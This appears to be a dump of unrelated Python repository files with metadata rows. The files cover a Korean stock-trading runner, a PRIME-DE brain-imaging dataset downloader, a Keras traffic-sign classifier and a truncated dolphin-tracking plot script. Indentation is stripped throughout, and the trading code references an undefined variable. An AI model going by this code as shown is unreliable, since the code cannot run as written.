strategy name, initial cap, monitor stocks 등 전략과 관련된 모든 정보는 DB에서 관리한다.
"""
print('Starting Runner instance')
# 유저 이름이 DB에 없다면, 장고 인터페이스를 통하여 유저 등록을 하여야 한다.
# >> python manage.py createsuperuser
self.db = UserDB(username)
self.api_queue = Queue()
self.port_queue = Queue()
self.order_queue = Queue()
self.tmp_queue = Queue()
self.data_queues = []
self.source = None # 같은 소스를 공유하는 여러 전략 실행할 수 있음 (반대 x)
self.initial_cap = {} # 전략별 initial_cap
self.strategies = {}
self.symbol_list = {} # 전략별 트래킹하는 종목 리스트
self.monitor_stocks = []
def init_strategy(self, strategy_name: str):
"""
DB에 저장되어 있지 않은 전략을 실행하려면 초기 세팅을 설정해줘야 한다.
"""
self.db.set_strategy(strategy_name)
self.db.get_strategy() # get_strategy를 호출하면 데이터를 생성하여 리턴하거나 필터하여 리턴한다.
def add_strategy(self, strategy_name: str or list):
try:
if type(strategy_name) == str:
strategy_name = [strategy_name]
for strategy in strategy_name:
self.db.set_strategy(strategy)
st = self.db.get_strategy()
self.strategies[strategy] = STRATEGY[st['using_strategy']]
# adding universe
self.symbol_list[strategy] = list(set(self.db.universe()))
# adding initial cap
self.initial_cap[strategy] = st['capital']
self.data_queues.append(Queue())
for st, uni in self.symbol_list.items():
self.monitor_stocks = list(set(self.monitor_stocks + uni))
except:
print(f'{strategy_name}은 존재하지 않습니다. STRATEGY 상수를 확인해주시기 바랍니다.')
print(traceback.format_exc())
def update_strategy(self, strategy_name, using_strategy=None, source=None, server_type=None, capital=None, currency=None, monitor_stocks=[]):
self.db.set_strategy(strategy_name)
self.db.save_strategy(using_strategy=using_strategy, source=source, server_type=server_type, capital=capital, currency=currency)
self.db.add_to_universe(symbol=monitor_stocks)
def start_trading(self, source: str, date_from: str = None, date_to: str = None, exclude: list = []):
"""
source: virtual, kiwoom, ebest, crypto
if source == virtual: date_from은 required, date_to가 없다면 date_to = date_from
test를 진행하기 위해서 exclude를 인자로 추가하였다.
exclude에는 data, portfolio, execution, strategy를 포함할 수 있으며,
exclude된 프로세스는 실행되지 않는다.
"""
if len(self.strategies) == 0:
raise Exception('전략 설정을 먼저 하고 실행해주세요. (add_strategy를 실행하여야 합니다.)')
else:
# Data Handler로 넘길 data_queues 생성
self.data_queues = [Queue() for _ in range(len(self.strategies))]
if source == 'virtual' and date_from is None:
raise Exception('Virtual API를 사용하려면 date_from을 yyyy-mm-dd 형식으로 설정하여야 합니다.')
elif source == 'virtual' and date_to is None:
date_to = date_from
# Process Setup
# STEP #1: Data Handler process
if 'data' not in exclude:
dp = Process(target=self._data_handler_process, args=(source,), name='DataHandler')
dp.start()
shm_info = self.tmp_queue.get()
sec_mem_name = shm_info['sec_mem_name']
sec_mem_shape = shm_info['sec_mem_shape']
sec_mem_dtype = shm_info['sec_mem_dtype']
else:
sec_mem_name, sec_mem_shape, sec_mem_dtype = None, None, None
# STEP #2: Portfolio process
if 'portfolio' not in exclude:
pp = Process(target=self._portfolio_process, args=(sec_mem_name, sec_mem_shape, sec_mem_dtype), name="Portfolio")
pp.start()
# STEP #3: Strategy processes
if 'strategy' not in exclude:
self._start_strategies(sec_mem_name, sec_mem_shape, sec_mem_dtype, source)
# STEP #4: Execution process
if 'execution' not in exclude:
ep = Process(target=self._execution_process, args=(self.port_queue, self.order_queue, server, source), name="ExecutionHandler")
ep.start()
# STEP #5: Main thread program (source programs)
if source == 'virtual':
self._init_virtual_setup(date_from, date_to)
elif source == 'kiwoom':
self._init_kiwoom_setup()
elif source == 'ebest':
self._init_ebest_setup()
elif source == 'crypto':
self._init_crypto_setup()
## Processes
def _data_handler_process(self, source):
"""
source는 Data Handler에서 데이터를 처리하는 방식이 소스별로 다를 수 있기 때문에 추가하였지만, 추후 제외하여도 됨
"""
d = DataHandler(data_queues=self.data_queues, port_queue=self.port_queue, api_queue=self.api_queue,
monitor_stocks=self.monitor_stocks, source=source)
self.tmp_queue.put({
'sec_mem_name': d.sec_mem.name,
'sec_mem_shape': d.sec_mem_shape,
'sec_mem_dtype': d.sec_mem_dtype,
})
d.start_event_loop()
def _portfolio_process(self, sec_mem_name, sec_mem_shape, sec_mem_dtype):
"""
여러 전략별 포트 정보를 관리할 수 있도록 Portfolio 객체 수정하기
"""
e = Portfolio(port_queue=self.port_queue, order_queue=self.order_queue, initial_caps=self.initial_cap,
monitor_stocks=self.monitor_stocks, sec_mem_name=sec_mem_name, sec_mem_shape=sec_mem_shape,
sec_mem_dtype=sec_mem_dtype)
e.start_event_loop()
def _execution_process(self, port_queue, order_queue, server, source):
"""
이베스트 객체 분리시켜서 주문은 무조건 order_queue로 넣기
"""
ex = ExecutionHandler(port_queue, order_queue, server, source)
ex.start_execution_loop()
def _strategy_process(self, id, strategy_cls, strategy_name, strategy_universe, sec_mem_name, sec_mem_shape, sec_mem_dtype, source):
sp = strategy_cls(data_queue=self.data_queues[id], port_queue=self.port_queue, order_queue=self.order_queue,
strategy_name=strategy_name, strategy_universe=strategy_universe, monitor_stocks=self.monitor_stocks,
sec_mem_name=sec_mem_name, sec_mem_shape=sec_mem_shape, sec_mem_dtype=sec_mem_dtype, source=source)
sp.calc_signals()
# 전략 관련 메소드
def _start_strategies(self, sec_mem_name, sec_mem_shape, sec_mem_dtype, source):
"""
각 전략별로 프로세스를 분리하여 실행시키기
"""
strategies = []
id = 0
for st, st_cls in self.strategies.items():
strategies.append(Process(target=self._strategy_process, args=(id, st_cls, st, self.symbol_list[st],
sec_mem_name, sec_mem_shape, sec_mem_dtype, source)))
id += 1
_ = [st.start() for st in strategies]
# API setup
def _init_virtual_setup(self, date_from, date_to):
self.api = VirtualAPI(self.api_queue)
self.api.stream_data(date_from, date_to, monitor_stocks=self.monitor_stocks)
def _init_kiwoom_setup(self, monitor_stocks):
app = QApplication(sys.argv)
_ = KiwoomRealtimeAPI(self.api_queue, self.port_queue, self.order_queue, monitor_stocks)
sys.exit(app.exec_())
def _init_ebest_setup(self, monitor_stocks):
ebest_data.Main(self.api_queue, self.port_queue, self.order_queue, monitor_stocks)
def _init_crypto_setup(self):
"""
crypto setup은 binance, upbit, bithumb 등 다양한 거래소를 동시에 사용할 수 있도록 한다.
국내 거래소를 통하여 btc를 구매한 다음 binance로 전송하여 트레이딩 하는 등 다양한 전략 구사가
가능하게 하기 위함이다.
"""
pass
if __name__ == '__main__':
r = Runner(username='ppark9553@gmail.com')
# 전략이 없다면 생성한 다음 add_strategy를 한다.
r.update_strategy(
strategy_name='strategy_1_first',
using_strategy='strategy_1',
capital=1000000,
monitor_stocks=['005930', '000020', '000030']
)
r.update_strategy(
strategy_name='strategy_1_second',
using_strategy='strategy_1',
capital=10000000,
monitor_stocks=['005930', '000270']
)
r.add_strategy(['strategy_1_first', 'strategy_1_second'])
r.start_trading(source='virtual', date_from='2021-02-03', exclude=['execution'])
print('r')
| [
"ppark9553@gmail.com"
] | ppark9553@gmail.com |
b960c2fd6d1c30aa4ebce4aebd86b7586a91c0b3 | 03d733b0c6ed233ecfd47d984acce8b779bf345b | /Exercícios/Mundo 1/ex010.py | dd68b19f265ff4a91f76b8fa1b954710f332b28c | [
"MIT"
] | permissive | gslmota/Programs-PYTHON | ccbc7aa758dfeb7ce0a011654fee62a8dd0f563d | cf6f98ded31e1bc32997ad6887d96e60975c3cad | refs/heads/master | 2022-11-29T08:54:48.535215 | 2020-08-09T23:44:06 | 2020-08-09T23:44:06 | 274,794,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | # Arrendondamento Número
import math
numero = float(input('Digite um número: '))
nbaixo = math.floor(numero)
print('O número {} tem como {} como parte inteira.'.format(numero, nbaixo)) | [
"gabrielsavio81@gmail.com"
] | gabrielsavio81@gmail.com |
992f7cf55c4bffc77e2110b339c9a3d091ef44f9 | d726a06a4fe344de854312cc2ae93558adefd206 | /pynet/datasets/primede.py | c26d45a1beb3a35e83cd5fbd315ba72c66df1ad0 | [
"LicenseRef-scancode-cecill-b-en"
] | permissive | CorentinAmbroise/pynet | 6f52f296b4ab5c651c341715786cb131391eabf1 | c353e5f80e75f785a460422ab7b39fa8f776991a | refs/heads/master | 2023-03-29T13:10:10.391193 | 2021-02-10T17:39:14 | 2021-02-10T17:39:14 | 278,072,885 | 0 | 0 | NOASSERTION | 2020-07-08T11:37:51 | 2020-07-08T11:37:51 | null | UTF-8 | Python | false | false | 14,409 | py | # -*- coding: utf-8 -*-
##########################################################################
# NSAp - Copyright (C) CEA, 2020
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
Module that provides functions to prepare the PRIME-DE dataset.
"""
# Imports
import os
import re
import glob
import copy
import json
import logging
import subprocess
import lxml.html as lh
from pprint import pprint
from collections import namedtuple
from collections import OrderedDict
import requests
import nibabel
import numpy as np
import pandas as pd
from pynet.datasets import Fetchers
# Global parameters
QC = [
"016032099-001",
"025032241-001",
"016032098-001",
"016032098-002",
"016032103-001",
"016032103-002",
"016032097-001",
"016032104-001",
"016032104-002",
"016032100-001",
"016032100-002",
"016032101-001",
"016032102-001"
]
URL = "https://s3.amazonaws.com/fcp-indi/data/Projects/INDI/PRIME/{0}.tar.gz"
DESC_URL = "http://fcon_1000.projects.nitrc.org/indi/PRIME/files/{0}.csv"
HOME_URL = "http://fcon_1000.projects.nitrc.org/indi/indiPRIME.html"
SITES = [
"amu",
"caltech",
"ecnu-chen",
"ecnu",
"ion",
"iscmj",
"mcgill",
"lyon",
"mountsinai-P",
"mountsinai-S",
"nki",
"NIMH_encrypted",
"NIMH-CT_encrypted",
"nin",
"neurospin",
"newcastle",
"ohsu",
"princeton",
"rockefeller",
"sbri",
"ucdavis",
"uminn",
"oxford_encrypted",
"oxford-PM",
"NINPBBUtrecht",
"uwo",
"georgetown"
]
TRANSCODING = dict((name, "site-{0}".format(name)) for name in SITES)
TRANSCODING["NINPBBUtrecht"] = "site-utrecht"
TRANSCODING["georgetown"] = "Archakov2020"
TRANSCODING["oxford-encrypted"] = "site-oxford"
HTML_SITES = {
"amu": "Aix-Marseille Université",
"caltech": "California Institute of Technology",
"ecnu-chen": "East China Normal University - Chen",
"ecnu": "East China Normal University - Kwok",
"ion": "Institute of Neuroscience",
"iscmj": "Institut des Sciences Cognitives Marc Jeannerod",
"mcgill": "McGill University",
"lyon": "Lyon Neuroscience Research Center",
"mountsinai-P": "Mount Sinai School of Medicine",
"mountsinai-S": "Mount Sinai School of Medicine",
"nki": "Nathan Kline Institute",
"NIMH-encrypted": "National Institute of Mental Health",
"NIMH-CT-encrypted": "National Institute of Mental Health",
"nin": "Netherlands Institute for Neuroscience",
"neurospin": "NeuroSpin",
"newcastle": "Newcastle University",
"ohsu": "Oregon Health and Science University",
"princeton": "Princeton University",
"rockefeller": "Rockefeller University",
"sbri": "Stem Cell and Brain Research Institute",
"ucdavis": "University of California, Davis",
"uminn": "University of Minnesota",
"oxford-encrypted": "University of Oxford",
"oxford-PM": "University of Oxford (PM)",
"NINPBBUtrecht": "NIN Primate Brain Bank/Utrecht University",
"uwo": "University of Western Ontario",
"georgetown": "Georgetown University"
}
EXTRA_SITE = dict((name, "{0}".format(name)) for name in SITES)
EXTRA_SITE["ecnu"] = "ecnu-kwok"
EXTRA_SITE["NIMH-encrypted"] = "NIMH-L"
EXTRA_SITE["NIMH-CT-encrypted"] = "NIMH-M"
EXTRA_SITE["sbri"] = "sbri_pheno"
EXTRA_SITE["oxford-encrypted"] = "oxford"
DATADIR = "/neurospin/lbi/monkeyfmri/PRIME_DE_database"
Item = namedtuple("Item", ["input_path", "output_path", "metadata_path"])
logger = logging.getLogger("pynet")
def download_primede(datasetdir):
""" Download the PRIME-DE dataset.
Reference: http://fcon_1000.projects.nitrc.org/indi/PRIMEdownloads.html
Parameters
----------
datasetdir: str
the dataset destination folder.
"""
logger.info("Download PRIME-DE dataset.")
if not os.path.isdir(datasetdir):
os.mkdir(datasetdir)
downloaddir = os.path.join(datasetdir, "download")
if not os.path.isdir(downloaddir):
os.mkdir(downloaddir)
for site in SITES:
localfile = os.path.join(downloaddir, "{0}.tar.gz".format(site))
if os.path.isfile(localfile):
logger.info(" - {0}".format(localfile))
continue
url = URL.format(site)
logger.info(" - {0}".format(url))
cmd = ["wget", "-P", downloaddir, url]
logger.debug(" ".join(cmd))
subprocess.check_call(cmd)
for site in SITES:
site = site.replace("_encrypted", "-encrypted")
localfile = os.path.join(downloaddir, "{0}.csv".format(
EXTRA_SITE[site]))
if os.path.isfile(localfile):
logger.info(" - {0}".format(localfile))
continue
url = DESC_URL.format(EXTRA_SITE[site])
logger.info(" - {0}".format(url))
cmd = ["wget", "-P", downloaddir, url]
logger.debug(" ".join(cmd))
try:
subprocess.check_call(cmd)
except:
pass
for site in SITES:
site = site.replace("_encrypted", "-encrypted")
tarballfile = os.path.join(downloaddir, "{0}.tar.gz".format(site))
if site not in TRANSCODING:
logger.info(" - {0}".format(site))
continue
localdir = os.path.join(downloaddir, "{0}".format(TRANSCODING[site]))
if os.path.isdir(localdir):
logger.info(" - {0}".format(localdir))
continue
cmd = ["tar", "-zxvf", tarballfile, "--directory", downloaddir]
logger.debug(" ".join(cmd))
subprocess.check_call(cmd)
infofile = os.path.join(downloaddir, "info.json")
info = convert_html_table(HOME_URL)
with open(infofile, "wt") as open_file:
json.dump(info, open_file, indent=4)
def convert_html_table(url):
""" Web scraping: HTML tables.
"""
page = requests.get(url)
doc = lh.fromstring(page.content)
tr_elements = doc.xpath("//tr")
assert all(len(tr_elements[0]) == len(row) for row in tr_elements)
data = []
for cnt, item in enumerate(tr_elements[0]):
name = item.text_content()
data.append((name, []))
for row in tr_elements[1:]:
for cnt, item in enumerate(row.iterchildren()):
value = item.text_content()
data[cnt][1].append(value)
return dict(data)
def organize_primede(datasetdir):
""" Organize the PRIME-DE dataset.
Put all the data in the same BIDS organized folder.
Parameters
----------
datasetdir: str
the dataset destination folder.
"""
logger.info("Download PRIME-DE dataset.")
downloaddir = os.path.join(datasetdir, "download")
rawdir = os.path.join(datasetdir, "rawdata")
if not os.path.isdir(rawdir):
os.mkdir(rawdir)
infofile = os.path.join(downloaddir, "info.json")
with open(infofile, "rt") as open_file:
info = json.load(open_file)
col_names = info.pop("")
info = dict((key, dict((_key, _val) for _key, _val in zip(col_names, val)))
for key, val in info.items())
metadata = OrderedDict(
(key, []) for key in ("participant_id", "site", "site_index",
"species", "scanner", "state", "age", "weight",
"housing", "sex", "implant", "usage_agreement"))
for site_idx, site in enumerate(SITES):
extrafile = os.path.join(downloaddir, "{0}.csv".format(
EXTRA_SITE[site]))
if os.path.isfile(extrafile):
df = pd.read_csv(extrafile, dtype=str)
if "SubID" in df.columns:
df["Subject ID"] = df["SubID"]
else:
df = pd.DataFrame.from_dict({"Subject ID": []})
if "Subject ID" not in df.columns:
raise ValueError("A 'Subject ID' column is mandatory in "
"'{0}'.".format(extrafile))
site_idx = str(site_idx + 1).zfill(3)
site = site.replace("_encrypted", "-encrypted")
if site not in TRANSCODING:
logger.info(" - {0}".format(site))
continue
localdir = os.path.join(downloaddir, "{0}".format(TRANSCODING[site]))
if not os.path.isdir(localdir):
logger.info(" - {0}".format(site))
continue
for sid in os.listdir(localdir):
if not sid.startswith("sub-"):
logger.info(" - {0}".format(sid))
continue
_sid = sid.replace("sub-", "")
_sid = re.sub("[^0-9]", "", _sid)
sidinfo = {}
if _sid in df["Subject ID"].values:
sidinfo = df[df["Subject ID"] == _sid]
elif _sid.lstrip("0") in df["Subject ID"].values:
sidinfo = df[df["Subject ID"] == _sid.lstrip("0")]
if len(sidinfo) > 1:
raise ValueError("Multiple match for '{0}' in '{1}'.".format(
_sid, extrafile))
elif len(sidinfo) > 0:
sidinfo = sidinfo.to_dict(orient="list")
sidinfo = dict((key.split(" ")[0].lower(), val[0])
for key, val in sidinfo.items())
if "sexe" in sidinfo:
sidinfo["sex"] = sidinfo["sexe"]
_sid = "sub-{0}{1}".format(site_idx, _sid)
siddir = os.path.join(localdir, sid)
subject = _sid.replace("sub-", "")
if subject in metadata["participant_id"]:
raise ValueError("Subject '{0}' is not unique.".format(sid))
metadata["participant_id"].append(subject)
metadata["site"].append(site)
metadata["site_index"].append(site_idx)
metadata["species"].append(info[HTML_SITES[site]]["Species"])
metadata["scanner"].append(info[HTML_SITES[site]]["Scanner"])
metadata["state"].append(info[HTML_SITES[site]]["State"])
metadata["age"].append(sidinfo.get("age", "nc"))
metadata["weight"].append(sidinfo.get("weight", "nc"))
metadata["housing"].append(sidinfo.get("housing", "nc"))
metadata["sex"].append(sidinfo.get("sex", "nc"))
metadata["implant"].append(sidinfo.get("implant", "nc"))
metadata["usage_agreement"].append(info[HTML_SITES[site]][
"Usage Agreement"])
cmd = ["mv", siddir, os.path.join(rawdir, _sid)]
logger.info(" ".join(cmd))
subprocess.check_call(cmd)
participantsfile = os.path.join(rawdir, "participants.tsv")
df = pd.DataFrame.from_dict(metadata)
df.to_csv(participantsfile, sep="\t", index=False)
desc = {
"Name": "primede",
"BIDSVersion": "1.0.2"
}
descfile = os.path.join(rawdir, "dataset_description.json")
with open(descfile, "wt") as open_file:
json.dump(desc, open_file, indent=4)
@Fetchers.register
def fetch_primede(datasetdir, maskdirname="brainmask"):
""" Fetch/prepare the PRIME-DE dataset for pynet.
Parameters
----------
datasetdir: str
the dataset destination folder.
maskdirname: str
name of the folder that contains the brain masks.
Returns
-------
item: namedtuple
a named tuple containing 'input_path', 'output_path', and
'metadata_path'.
"""
logger.info("Loading PRIME-DE dataset.")
imdirname = os.path.split(os.sep)[-1]
if not os.path.isdir(datasetdir):
os.mkdir(datasetdir)
desc_path = os.path.join(datasetdir, "pynet_primede.tsv")
input_path = os.path.join(datasetdir, "pynet_primede_inputs.npy")
output_path = os.path.join(datasetdir, "pynet_primede_outputs.npy")
if not os.path.isfile(desc_path):
metadata = OrderedDict(
(key, []) for key in ("participant_id", "site", "with_mask",
"valid", "session", "run"))
anat_files = glob.glob(os.path.join(
datasetdir, "sub-*", "ses-*", "anat", "*acq-nc1iso*.nii.gz"))
if len(anat_files) == 0:
raise ValueError("Your dataset directory must contain the Prime "
"DE data organized with the function provided in "
"this module and preprocessed.")
inputs = []
outputs = []
for path in anat_files:
sid = path.split(os.sep)[-4].replace("sub-", "")
ses = path.split(os.sep)[-3].replace("ses-", "")
inputs.append(nibabel.load(path).get_data())
mask_path = path.replace(imdirname, maskdirname).replace(
"acq-nc1iso", "acq-c1iso").replace(".nii.gz", "_mask.nii.gz")
with_mask = 0
if os.path.isfile(mask_path):
outputs.append(nibabel.load(mask_path).get_data())
with_mask = 1
else:
outputs.append(np.zeros((90, 90, 60), dtype=int))
basename = os.path.basename(path)
match = re.findall("run-(\d+)_", basename)
if len(match) == 1:
run = match[0]
else:
run = "nc"
valid = 1
if "{0}-{1}".format(sid, ses) in QC:
valid = 0
metadata["participant_id"].append(sid)
metadata["site"].append(sid[:3])
metadata["with_mask"].append(with_mask)
metadata["valid"].append(valid)
metadata["session"].append(ses)
metadata["run"].append(run)
inputs = np.asarray(inputs)
outputs = np.asarray(outputs)
inputs_im = nibabel.Nifti1Image(
inputs.transpose(1, 2, 3, 0), np.eye(4))
outputs_im = nibabel.Nifti1Image(
outputs.transpose(1, 2, 3, 0), np.eye(4))
inputs = np.expand_dims(inputs, axis=1)
outputs = np.expand_dims(outputs, axis=1)
np.save(input_path, inputs)
np.save(output_path, outputs)
nibabel.save(inputs_im, input_path.replace(".npy", ".nii.gz"))
nibabel.save(outputs_im, output_path.replace(".npy", ".nii.gz"))
df = pd.DataFrame.from_dict(metadata)
df.to_csv(desc_path, sep="\t", index=False)
return Item(input_path=input_path, output_path=output_path,
metadata_path=desc_path)
| [
"antoine.grigis@cea.fr"
] | antoine.grigis@cea.fr |
5783ce1e2789f35719b925425e95f886b574fd59 | 76d8f9d741d4e0bbd15a2c29fa77d041c01ea9bf | /exercise/keras/trafficsign.py | a422aaf4c134f2d7e34383236a64a9a9fb67fcf1 | [] | no_license | LevinJ/Behavioural-Cloning-P3 | d92bf3500797019a3fcf038a5c0e817f445e7a39 | fff8993ba2671c9664ab65899db952e2f5de37da | refs/heads/master | 2020-06-22T03:16:27.869561 | 2016-12-19T00:19:06 | 2016-12-19T00:19:06 | 74,758,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,848 | py | from utility.dumpload import DumpLoad
import numpy as np
from sklearn.preprocessing import scale
import pandas as pd
import os
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, Activation
from sklearn.preprocessing import OneHotEncoder
from keras.optimizers import Adam
from sklearn.cross_validation import train_test_split
from keras.layers import Dropout, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.utils import np_utils
from keras import backend as K
class TrafficeSign(object):
def __init__(self):
return
def __get_data(self, filepath):
dump_load = DumpLoad(filepath)
data = dump_load.load()
features = data['features']
labels = data['labels'][:, np.newaxis]
return features, labels
def load_data(self):
self.X_train, self.y_train =self. __get_data('./train.p')
self.X_test, self.y_test = self.__get_data('./test.p')
assert(self.X_train.shape[0] == self.y_train.shape[0]), "The number of images is not equal to the number of labels."
assert(self.X_train.shape[1:] == (32,32,3)), "The dimensions of the images are not 32 x 32 x 3."
return
def normalize_data(self):
max = 0.5
min = -0.5
train_min = self.X_train.min()
train_max = self.X_train.max()
self.X_train = self.X_train.astype('float32')
self.X_test = self.X_test.astype('float32')
#normalize training/val data
self.X_train = (self.X_train - train_min) / (train_max - train_min) * (max - min) + min
#normalize test data
self.X_test = ((self.X_test - train_min) / (train_max - train_min)) * (max - min) + min
# scaler = MinMaxScaler(feature_range=(-0.5, 0.5))
# self.X_train = scaler.fit_transform(self.X_train.ravel())
assert(round(np.mean(self.X_train)) == 0), "The mean of the input data is: %f" % np.mean(self.X_train)
assert(np.min(self.X_train) == -0.5 and np.max(self.X_train) == 0.5), "The range of the input data is: %.1f to %.1f" % (np.min(self.X_train), np.max(self.X_train))
return
def two_layer_net(self):
model = Sequential()
model.add(Dense(128, input_dim=32*32*3, name="hidden1"))
model.add(Activation("relu"))
model.add(Dense(output_dim=43, name="output"))
model.add(Activation("softmax"))
# STOP: Do not change the tests below. Your implementation should pass these tests.
assert(model.get_layer(name="hidden1").input_shape == (None, 32*32*3)), "The input shape is: %s" % model.get_layer(name="hidden1").input_shape
assert(model.get_layer(name="output").output_shape == (None, 43)), "The output shape is: %s" % model.get_layer(name="output").output_shape
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),
metrics=['accuracy'])
self.encoder = OneHotEncoder(sparse=False).fit(self.y_train)
y_train_encoded = self.encoder.transform(self.y_train)
history = model.fit(self.X_train.reshape(-1,32*32*3), y_train_encoded, nb_epoch=2, batch_size=32, verbose=2)
# STOP: Do not change the tests below. Your implementation should pass these tests.
print("The training accuracy was: {}".format( history.history['acc']))
assert(history.history['acc'][0] > 0.5), "The training accuracy was: {}".format( history.history['acc'])
return
def two_layer_net_split(self):
model = Sequential()
model.add(Dense(128, input_dim=32*32*3, name="hidden1"))
model.add(Activation("relu"))
model.add(Dense(output_dim=43, name="output"))
model.add(Activation("softmax"))
# STOP: Do not change the tests below. Your implementation should pass these tests.
assert(model.get_layer(name="hidden1").input_shape == (None, 32*32*3)), "The input shape is: %s" % model.get_layer(name="hidden1").input_shape
assert(model.get_layer(name="output").output_shape == (None, 43)), "The output shape is: %s" % model.get_layer(name="output").output_shape
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),
metrics=['accuracy'])
self.X_train, self.X_val, self.y_train, self.y_val = train_test_split(self.X_train, self.y_train, test_size=0.25, random_state=42)
self.encoder = OneHotEncoder(sparse=False,n_values = 43).fit(self.y_train)
y_train_encoded = self.encoder.transform(self.y_train)
y_val_encoded = self.encoder.transform(self.y_val)
history = model.fit(self.X_train.reshape(-1,32*32*3), y_train_encoded, nb_epoch=2, batch_size=32, verbose=2,
validation_data=(self.X_val.reshape(-1,32*32*3), y_val_encoded))
# STOP: Do not change the tests below. Your implementation should pass these tests.
assert(round(self.X_train.shape[0] / float(self.X_val.shape[0])) == 3), "The training set is %.3f times larger than the validation set." % self.X_train.shape[0] / float(self.X_val.shape[0])
assert(history.history['val_acc'][0] > 0.6), "The validation accuracy is: %.3f" % history.history['val_acc'][0]
return
def cnn_net(self):
model = Sequential()
#layer 1
model.add(Convolution2D(32, 3, 3,
border_mode='valid',
input_shape=(32,32,3), name="conv1"))
model.add(Activation('relu'))
model.add(MaxPooling2D())
model.add(Dropout(0.5))
#layer 2
model.add(Flatten())
model.add(Dense(128, name="hidden1"))
model.add(Activation("relu"))
#layer 3
model.add(Dense(output_dim=43, name="output"))
model.add(Activation("softmax"))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),
metrics=['accuracy'])
self.X_train, self.X_val, self.y_train, self.y_val = train_test_split(self.X_train, self.y_train, test_size=0.25, random_state=42)
self.encoder = OneHotEncoder(sparse=False,n_values = 43).fit(self.y_train)
y_train_encoded = self.encoder.transform(self.y_train)
y_val_encoded = self.encoder.transform(self.y_val)
y_test_encoded = self.encoder.transform(self.y_test)
history = model.fit(self.X_train, y_train_encoded, nb_epoch=30, batch_size=32, verbose=2,
validation_data=(self.X_val, y_val_encoded))
# STOP: Do not change the tests below. Your implementation should pass these tests.
#assert(history.history['val_acc'][0] > 0.9), "The validation accuracy is: %.3f" % history.history['val_acc'][0]
_, train_acc = model.evaluate(self.X_train, y_train_encoded, verbose=0)
_, val_acc = model.evaluate(self.X_val, y_val_encoded, verbose=0)
_, test_acc = model.evaluate(self.X_test, y_test_encoded, verbose=0)
print('train{:.3f}, val{:.3f}: test{:.3f}'.format(train_acc, val_acc, test_acc))
return
def run(self):
self.load_data()
self.normalize_data()
# self.two_layer_net()
# self.two_layer_net_split()
self.cnn_net()
return
if __name__ == "__main__":
obj= TrafficeSign()
obj.run() | [
"jianzhirong@gmail.com"
] | jianzhirong@gmail.com |
92ea114b1907807cc47d45d2b77ee51981cafab8 | 887f2e664c6d92f17e784f57022333a2fb859d06 | /analysis/plotMove.py | 252a91a4c6be6dc9ba8b647cac05970a426f3080 | [] | no_license | ctorney/dolphinUnion | 1968e258c6045060b2c921bd723d0ef0daea0147 | 9d7212d172a8a48a36fc4870fcdb04d66130bb76 | refs/heads/master | 2021-01-19T04:40:57.286526 | 2017-08-17T20:44:58 | 2017-08-17T20:44:58 | 46,424,670 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,332 | py | import numpy as np
import pandas as pd
import os, re
import math
import time
from scipy import interpolate
from scipy import ndimage
import matplotlib.pyplot as plt
import matplotlib.pyplot as plt
import matplotlib.animation as ani
HD = os.getenv('HOME')
FILELIST = HD + '/workspace/dolphinUnion/tracking/solo/fileList.csv'
DATADIR = HD + '/Dropbox/dolphin_union/2015_footage/Solo/processedTracks/'
df = pd.read_csv(FILELIST)
for index, row in df.iterrows():
noext, ext = os.path.splitext(row.filename)
posfilename = DATADIR + '/TRACKS_' + str(index) + '_' + noext + '.csv'
gridfilename = DATADIR + '/GRID_' + str(index) + '_' + noext + '.npy'
gridPosfilename = DATADIR + '/GRIDPOS_' + str(index) + '_' + noext + '.npy'
posDF = pd.read_csv(posfilename)
posDF = posDF[posDF['frame']%60==0]
# posDF['x']=posDF['x']-min(posDF['x'])
# posDF['y']=posDF['y']-min(posDF['y'])
# xrange = max(posDF['x'])
# yrange = max(posDF['y'])
# nx = math.ceil(xrange/32)
# ny = math.ceil(yrange/32)
# grid = np.zeros((nx,ny,2))
# gridPos = np.zeros((nx,ny,2))
# xh = np.cos(posDF['heading'].values)
# yh = np.sin(posDF['heading'].values)
# xdirs = posDF['dx'].values
# ydirs = posDF['dy'].values
# xp = posDF['x'].values
# yp = posDF['y'].values
# kappa = 32.0*32.0
# for i in range(nx):
# for j in range(ny):
# gx = i * 32
# gy = j * 32
# dists = (((posDF['x'].values - gx)**2 + (posDF['y'].values - gy)**2))
# weights = np.exp(-dists/kappa)
# gridPos[i,j,0]=gx
# gridPos[i,j,1]=gy
# xav = np.sum(weights*xdirs)/np.sum(weights)
# yav = np.sum(weights*ydirs)/np.sum(weights)
# grid[i,j,0]=xav/math.sqrt(xav**2+yav**2)
# grid[i,j,1]=yav/math.sqrt(xav**2+yav**2)
grid = np.load(gridfilename)
gridPos = np.load(gridPosfilename)
#plt.quiver(xp,yp,xh,yh,angles='xy', scale_units='xy', color='r', scale=1.0/32.0)
#plt.quiver(gridPos[:,:,0],gridPos[:,:,1],grid[:,:,0],grid[:,:,1],angles='xy', scale_units='xy', scale=1.0/32.0)
winLen = 30
w = np.kaiser(winLen,1)
w = w/w.sum()
maxRange = 0
flen = len(posDF.groupby('frame'))
Xcentroids = np.zeros((flen))
Ycentroids = np.zeros((flen))
fc=0
for fnum, frame in posDF.groupby('frame'):
dist = max(frame['x'].values)-min(frame['x'].values)
if dist>maxRange:
maxRange=dist
dist = max(frame['y'].values)-min(frame['y'].values)
if dist>maxRange:
maxRange=dist
Xcentroids[fc] = np.average(frame['x'].values)
Ycentroids[fc] = np.average(frame['y'].values)
fc=fc+1
Xcentroids = np.r_[np.ones((winLen))*Xcentroids[0],Xcentroids,np.ones((winLen))*Xcentroids[-1]]
Xcentroids = np.convolve(w/w.sum(),Xcentroids,mode='same')[(winLen):-(winLen)]
